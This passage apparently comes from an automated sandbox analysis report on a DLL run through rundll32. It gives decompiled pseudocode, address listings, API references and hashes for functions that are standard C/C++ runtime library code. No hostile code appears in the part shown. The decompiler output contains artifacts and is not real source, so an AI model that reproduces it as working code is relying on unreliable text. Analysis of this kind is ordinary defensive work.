							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6E1E161C(0x6e2dce90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6E1E171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6E2066BA(_t88 - 0x14);
								return E6E220075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6E204F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6E1E1438(_t76);
										E6E223D74(_t88 - 0x20, 0x6e2c3504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6E206FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6e2dce7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6E206FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6e2dce84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}











                          0x6e2046ab
                          0x6e2046b2
                          0x6e2046bc
                          0x6e2046c1
                          0x6e2046ca
                          0x6e2046d0
                          0x6e2046d3
                          0x6e2046d8
                          0x6e2046dc
                          0x6e2046e1
                          0x6e2046e5
                          0x6e204720
                          0x6e204723
                          0x6e20472f
                          0x6e2046e7
                          0x6e2046e9
                          0x6e2046ef
                          0x6e2046f5
                          0x6e2046fd
                          0x6e204700
                          0x6e204733
                          0x6e204741
                          0x6e204746
                          0x6e20474e
                          0x6e204758
                          0x6e20475d
                          0x6e204766
                          0x6e20476c
                          0x6e20476f
                          0x6e204774
                          0x6e20477d
                          0x6e20477f
                          0x6e204781
                          0x6e2047bc
                          0x6e2047bf
                          0x6e2047cb
                          0x6e204783
                          0x6e204783
                          0x6e204785
                          0x6e20478b
                          0x6e204791
                          0x6e204799
                          0x6e20479c
                          0x6e2047cc
                          0x6e2047cf
                          0x6e2047dd
                          0x6e2047e2
                          0x6e2047e3
                          0x6e2047e7
                          0x6e20479e
                          0x6e20479e
                          0x6e2047a1
                          0x6e2047a5
                          0x6e2047a9
                          0x6e2047b3
                          0x6e2047b6
                          0x00000000
                          0x6e2047b6
                          0x6e204787
                          0x6e204787
                          0x00000000
                          0x6e204787
                          0x6e204785
                          0x6e204702
                          0x6e204702
                          0x6e204705
                          0x6e204709
                          0x6e20470d
                          0x6e204717
                          0x6e20471a
                          0x00000000
                          0x6e20471a
                          0x6e2046eb
                          0x6e2046eb
                          0x00000000
                          0x6e2046eb
                          0x6e2046e9

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2046B2
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2046BC
                          • int.LIBCPMT ref: 6E2046D3
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20470D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E204723
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E204741
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
                          • Instruction ID: 325578467af4ab80f22256d81193297801e9c7faf2b1cfb461339df5bedec8d4
                          • Opcode Fuzzy Hash: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
                          • Instruction Fuzzy Hash: C211047AE0052E9FCB01DBE0C854AEDB77BBF55715F104A08E510AB2D0EBB49A45C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24D5FF, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E24D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6e2c51e4; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6E24C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6E254196(_t25, __eflags,  *0x6e2c51e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E24D33F(_t25, _t31, 0x6e2c76f0);
							E6E24CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6E24CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6E2462FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6e2c51e4; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6E24C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6E254196(_t27, __eflags,  *0x6e2c51e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6E24D33F(_t27, _t32, 0x6e2c76f0);
									E6E24CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6E24CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6E254140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6E254140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                          0x6e24d5ff
                          0x6e24d5ff
                          0x6e24d5ff
                          0x6e24d609
                          0x6e24d60b
                          0x6e24d610
                          0x6e24d613
                          0x6e24d621
                          0x6e24d628
                          0x6e24d62d
                          0x6e24d630
                          0x6e24d633
                          0x6e24d645
                          0x6e24d64a
                          0x6e24d64c
                          0x6e24d657
                          0x6e24d65e
                          0x6e24d663
                          0x6e24d666
                          0x6e24d668
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d64e
                          0x6e24d64e
                          0x00000000
                          0x6e24d64e
                          0x6e24d635
                          0x6e24d635
                          0x6e24d636
                          0x6e24d636
                          0x6e24d63b
                          0x6e24d676
                          0x6e24d677
                          0x6e24d67d
                          0x6e24d682
                          0x6e24d685
                          0x6e24d686
                          0x6e24d687
                          0x6e24d68e
                          0x6e24d690
                          0x6e24d692
                          0x6e24d697
                          0x6e24d69a
                          0x6e24d6a8
                          0x6e24d6b4
                          0x6e24d6b7
                          0x6e24d6ba
                          0x6e24d6cc
                          0x6e24d6d1
                          0x6e24d6d3
                          0x6e24d6de
                          0x6e24d6e4
                          0x6e24d6ec
                          0x6e24d6ee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d6d5
                          0x6e24d6d5
                          0x00000000
                          0x6e24d6d5
                          0x6e24d6bc
                          0x6e24d6bc
                          0x6e24d6bd
                          0x6e24d6bd
                          0x6e24d6f0
                          0x6e24d6f1
                          0x6e24d6f1
                          0x6e24d69c
                          0x6e24d6a2
                          0x6e24d6a6
                          0x6e24d6f9
                          0x6e24d6fa
                          0x6e24d700
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d6a6
                          0x6e24d707
                          0x6e24d707
                          0x6e24d615
                          0x6e24d61b
                          0x6e24d61f
                          0x6e24d66a
                          0x6e24d66b
                          0x6e24d675
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d61f

                          APIs
                          • GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D603
                          • _free.LIBCMT ref: 6E24D636
                          • _free.LIBCMT ref: 6E24D65E
                          • SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D66B
                          • SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D677
                          • _abort.LIBCMT ref: 6E24D67D
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: d2fe61aabf60fe11ff2eb48046d37259dfd7d6bd7e0e0fe6a602364a27b7c18a
                          • Instruction ID: 9a7cd09454368dbab1051a50c8191e7456ad7ac45acccf8267cc2d1e10e6fa86
                          • Opcode Fuzzy Hash: d2fe61aabf60fe11ff2eb48046d37259dfd7d6bd7e0e0fe6a602364a27b7c18a
                          • Instruction Fuzzy Hash: BBF0493904490DE7C78926F9EC0DF8A233F8BC2A66B244911F428D7184EFB488028874
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2075E8, Relevance: 9.0, APIs: 6, Instructions: 33COMMON
                          Download Yara Rule
                          C-Code - Quality: 51%
                          			E6E2075E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6E2073A9( &_v16, _a4);
				E6E223D74( &_v16, 0x6e2c14fc);
				asm("int3");
				_push(_t35);
				E6E2073E3( &_v44, _v24);
				E6E223D74( &_v44, 0x6e2c1538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6E207426( &_v76, _v52);
				E6E223D74( &_v76, 0x6e2c15ac);
				asm("int3");
				_push(_t33);
				E6E1E1420( &_v68, _v48);
				E6E223D74( &_v68, 0x6e2c3450);
				asm("int3");
				return  &M6E26A3FC;
			}













                          0x6e2075eb
                          0x6e2075f4
                          0x6e207602
                          0x6e207607
                          0x6e207608
                          0x6e207614
                          0x6e207622
                          0x6e207627
                          0x6e207628
                          0x6e207629
                          0x6e207634
                          0x6e207642
                          0x6e207647
                          0x6e207648
                          0x6e207654
                          0x6e207662
                          0x6e207667
                          0x6e20766d

                          APIs
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E2075F4
                            • Part of subcall function 6E2073A9: std::exception::exception.LIBCONCRT ref: 6E2073B6
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207602
                            • Part of subcall function 6E223D74: RaiseException.KERNEL32(00000000,?,u n,00000000,?,?,?,?,?,?,?,6E2075E7,00000000,6E2C14C0,?), ref: 6E223DD4
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E207614
                            • Part of subcall function 6E2073E3: std::exception::exception.LIBCONCRT ref: 6E2073F0
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207622
                          • std::regex_error::regex_error.LIBCPMT ref: 6E207634
                            • Part of subcall function 6E207426: std::exception::exception.LIBCONCRT ref: 6E20743E
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207642
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
                          • String ID:
                          • API String ID: 2570946744-0
                          • Opcode ID: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
                          • Instruction ID: bc20243a92160734bc8aa5ec56accde5d901f2cb113101ed41dab999bf1482eb
                          • Opcode Fuzzy Hash: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
                          • Instruction Fuzzy Hash: 44F0FE39C0010D7BCB05FBE4DC49CDDB77EAA14544F804A20AA1496591EB71A659C6D2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2053EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E2053EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t66;
				void* _t70;
				void* _t78;

				_t61 = __edx;
				E6E22014E(0x6e268264, __ebx, __edi, __esi, 0xa4);
				_t55 = __ecx;
				 *((intOrPtr*)(_t70 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t70 - 0x44)) = E6E241A3F(__ecx, __edx);
				_t35 = E6E2091D8(__ecx, __edx, _t78, _t70 - 0x80);
				_t58 = 0xb;
				memcpy(_t70 - 0x40, _t35, _t58 << 2);
				_t66 =  *((intOrPtr*)(_t70 - 0x44));
				_t79 =  *((char*)(_t70 + 0xc));
				 *((intOrPtr*)(_t55 + 8)) = 0;
				 *((intOrPtr*)(_t55 + 0x10)) = 0;
				 *((intOrPtr*)(_t55 + 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t13 = _t66 + 8; // 0x0
					 *((intOrPtr*)(_t70 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t70 - 0x48)) = 0x6e2794dd;
				}
				E6E2091D8(_t55, _t61, _t79, _t70 - 0x80);
				_push(_t70 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t55 + 8)) = E6E205B01(_t61, _t66, 0, _t70, _t79,  *((intOrPtr*)(_t70 - 0x48)));
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x10)) = E6E1E17AF(_t55, _t61, _t66, 0, _t70, _t79, "false", 0);
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x14)) = E6E1E17AF(_t55, _t61, _t66, 0, _t70, _t79, "true", 0);
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t28 = _t66 + 0x30; // 0x0
					 *((short*)(_t55 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t66 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
				} else {
					 *((short*)(_t55 + 0xc)) = E6E1E177E(0x2e, 0, _t70 - 0x40);
					_t49 = E6E1E177E(0x2c, 0, _t70 - 0x40);
				}
				 *((short*)(_t55 + 0xe)) = _t49;
				return E6E22009B(_t49, _t55, _t66, 0);
			}










                          0x6e2053eb
                          0x6e2053f5
                          0x6e2053fa
                          0x6e2053fc
                          0x6e205404
                          0x6e20540b
                          0x6e205413
                          0x6e205419
                          0x6e20541b
                          0x6e205420
                          0x6e205424
                          0x6e205427
                          0x6e20542a
                          0x6e20542d
                          0x6e205430
                          0x6e20543b
                          0x6e20543e
                          0x6e205432
                          0x6e205432
                          0x6e205432
                          0x6e205445
                          0x6e205451
                          0x6e205452
                          0x6e20545e
                          0x6e205464
                          0x6e205473
                          0x6e205479
                          0x6e205488
                          0x6e20548f
                          0x6e2054bf
                          0x6e2054c5
                          0x6e2054c9
                          0x6e2054cc
                          0x6e205491
                          0x6e2054a0
                          0x6e2054ab
                          0x6e2054b0
                          0x6e2054b3
                          0x6e2054bc

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Getcvt$H_prolog3_catch_
                          • String ID: false$true
                          • API String ID: 1810345438-2658103896
                          • Opcode ID: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
                          • Instruction ID: 7531bd0d55aa755e4efd8bfd98f7d9ad7d5b170f848d142ec67f51e9ce84f4e5
                          • Opcode Fuzzy Hash: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
                          • Instruction Fuzzy Hash: E7216DB6D0121CAFDB11CFE5C884ADEBBB9BF05710F04446AE9049F640EB709A95CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E24972F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E249742
                          • FreeLibrary.KERNEL32(00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E249765
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
                          • Instruction ID: 11d5c449a251d1c9f717f503511100945b597d2cf1bf1fc52f41c0e5bb53406a
                          • Opcode Fuzzy Hash: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
                          • Instruction Fuzzy Hash: B1F0AF7090052EFBDF419F90C958FAEBFBAEF05712F0081A8A905A6240DB319A40CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E254E2A, Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E6E254E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_t59 =  *0x6e2c506c; // 0x5cc08226
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6E231F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6E242281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6E242281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6E242281())) = 0x16;
					E6E24215B();
					goto L59;
				} else {
					L59:
					return E6E21F8A5(_v8 ^ _t112, _t106, _t111);
				}
			}





































                          0x6e254e2a
                          0x6e254e32
                          0x6e254e39
                          0x6e254e3c
                          0x6e254e40
                          0x6e254e44
                          0x6e254e46
                          0x6e254e49
                          0x6e254e4d
                          0x6e254e50
                          0x6e254e55
                          0x6e254e64
                          0x6e254e84
                          0x6e254e89
                          0x6e254e8e
                          0x6e25502b
                          0x6e255034
                          0x6e255066
                          0x6e25506e
                          0x6e25507a
                          0x6e25507a
                          0x6e25507f
                          0x6e255082
                          0x00000000
                          0x6e255075
                          0x6e255075
                          0x6e255075
                          0x6e255088
                          0x6e25508c
                          0x6e255091
                          0x6e255091
                          0x00000000
                          0x6e255098
                          0x6e25506e
                          0x6e255036
                          0x6e25503c
                          0x6e255054
                          0x6e255054
                          0x00000000
                          0x6e255054
                          0x6e25503e
                          0x6e255043
                          0x6e255048
                          0x6e25504b
                          0x6e25504c
                          0x6e255052
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e255052
                          0x00000000
                          0x6e255043
                          0x6e254e94
                          0x6e254e9d
                          0x6e254ed7
                          0x6e254f50
                          0x6e254f54
                          0x6e254f6a
                          0x6e25501b
                          0x6e25501b
                          0x6e255020
                          0x6e255023
                          0x00000000
                          0x6e254f7f
                          0x6e254f81
                          0x00000000
                          0x00000000
                          0x6e254f87
                          0x6e254f8a
                          0x6e254f8a
                          0x6e254f8d
                          0x6e254f93
                          0x6e254f97
                          0x6e254f97
                          0x6e254fa9
                          0x6e254faf
                          0x6e254fb2
                          0x6e254fb6
                          0x00000000
                          0x00000000
                          0x6e254fdb
                          0x00000000
                          0x00000000
                          0x6e254fe1
                          0x6e254fe3
                          0x6e254fe8
                          0x6e255008
                          0x6e25500b
                          0x6e25500e
                          0x6e255013
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e255019
                          0x6e254fea
                          0x6e254fed
                          0x6e254fed
                          0x6e254ff1
                          0x6e254ff6
                          0x00000000
                          0x00000000
                          0x6e254fff
                          0x6e255000
                          0x6e255001
                          0x6e255006
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e255006
                          0x00000000
                          0x6e254fed
                          0x00000000
                          0x6e254f8a
                          0x6e254f6a
                          0x6e254f59
                          0x00000000
                          0x00000000
                          0x6e254f5f
                          0x6e254f5f
                          0x00000000
                          0x6e254f5f
                          0x6e254edb
                          0x6e254f01
                          0x6e254f14
                          0x6e254f18
                          0x00000000
                          0x6e254f28
                          0x6e254f30
                          0x6e254f36
                          0x6e254f36
                          0x00000000
                          0x6e254f30
                          0x6e254f18
                          0x6e254edd
                          0x6e254edf
                          0x6e254ee2
                          0x6e254ee7
                          0x6e254eea
                          0x6e254eea
                          0x6e254eee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254eee
                          0x6e254ef3
                          0x6e254f00
                          0x6e254f00
                          0x00000000
                          0x6e254ef3
                          0x6e254ea1
                          0x00000000
                          0x00000000
                          0x6e254ea7
                          0x6e254eac
                          0x6e254eb7
                          0x6e254eba
                          0x6e254ebd
                          0x6e254ec3
                          0x00000000
                          0x00000000
